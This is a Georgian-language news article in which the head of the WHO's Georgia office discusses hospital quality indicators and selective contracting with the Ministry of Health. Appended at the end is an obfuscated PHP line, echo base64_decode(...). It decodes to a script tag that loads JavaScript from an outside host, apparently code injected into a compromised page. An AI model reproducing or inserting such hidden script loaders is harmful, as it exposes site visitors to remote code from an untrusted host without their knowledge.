celsiusi
ავერსი საქკაბელი
ჯანდაცვის სამინისტროსთან დავიწყეთ მუშაობა, საავადმყოფოების ხარისხის ინდიკატორების განსაზღვრის მიმართულებით. ეს მნიშვნელოვანი საკითხია საქართველოსთვის, რადგან ჯანდაცვაზე გამოყოფილი ბიუჯეტის დიდი ნაწილი, საავადმყოფოებზე ნაწილდება და სამინისტრო უნდა იყოს დარწმუნებული ამ დანახარჯების ეფექტურობაში, რაც იმას ნიშნავს, რომ პაციენტები უსაფრთხოდ არიან და იღებენ შესაბამის, ხარისხიან დახმარებას, - აღნიშნულის შესახებ, ჯანდაცვის მსოფლიო ორგანიზაციის საქართველოს წარმომადგენლობის ხელმძღვანელმა, სილვიუ დომენტემ განაცხადა.
 
მისი თქმით, საავადმყოფოების მონიტორინგის სისტემების გამოყენება საერთაშორისოდ აპრობირებული პრაქტიკაა და მას სხვა ქვეყნები აქტიურად იყენებენ.
 
„აღნიშნულ სისტემებს აქვთ შესაბამისი კრიტერიუმები და ინდიკატორები, მათი დახმარებით ხდება გაწეული ხარისხის შეფასება. ძირითადად, ეს ინდიკატორები დაკავშირებულია ლეტალობასთან, ასევე, შესაძლოა, დაკავშირებული იყოს პაციენტის კმაყოფილებასთან. საბოლოოდ, ამან, შესაძლოა, მიგვიყვანოს სელექციურ კონტრაქტირებასთან. სამინისტროს შეუძლია, ითანამშრომლოს სამედიცინო დაწესებულებებთან კონკრეტული კრიტერიუმების მიხედვით. სელექციური კონტრაქტირება ამცირებს დანახარჯებს, ლეტალობის მაჩვენებლებს და აუმჯობესებს მკურნალობის საერთო შედეგს. ასევე, მინდა აღვნიშნო, რომ ბევრი ქვეყანა ევროპის რეგიონში ირჩევს უკეთესი დაგეგმვისა და სელექციური კონტრაქტირების გზას, ამის მაგალითია ნიდერლანდები და გერმანია“, - განაცხადა სილვიუ დომენტემ.
 
შეგახსენებთ, რომ ჯანდაცვის სამინისტრო, ჰოსპიტალური მომსახურების ხარისხის შეფასების ინდიკატორებზე მუშაობს. ცვლილების მიზანი, სამედიცინო დაწესებულებებში მომსახურების ხარისხის გაუმჯობესება და პაციენტთა უსაფრთხოების უზრუნველყოფაა. ხარისხის შეფასებისთვის, სხვა ინდიკატორებთან ერთად, გათვალისწინებული იქნება რეჰოსპიტალიზაციისა და ლეტალობის მაჩვენებლებიც. ჰოსპიტალური მომსახურების ხარისხის შეფასების ინდიკატორებზე მუშაობა ჯანმრთელობის მსოფლიო ორგანიზაციის ექსპერტების ჩართულობით მიმდინარეობს.
226
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");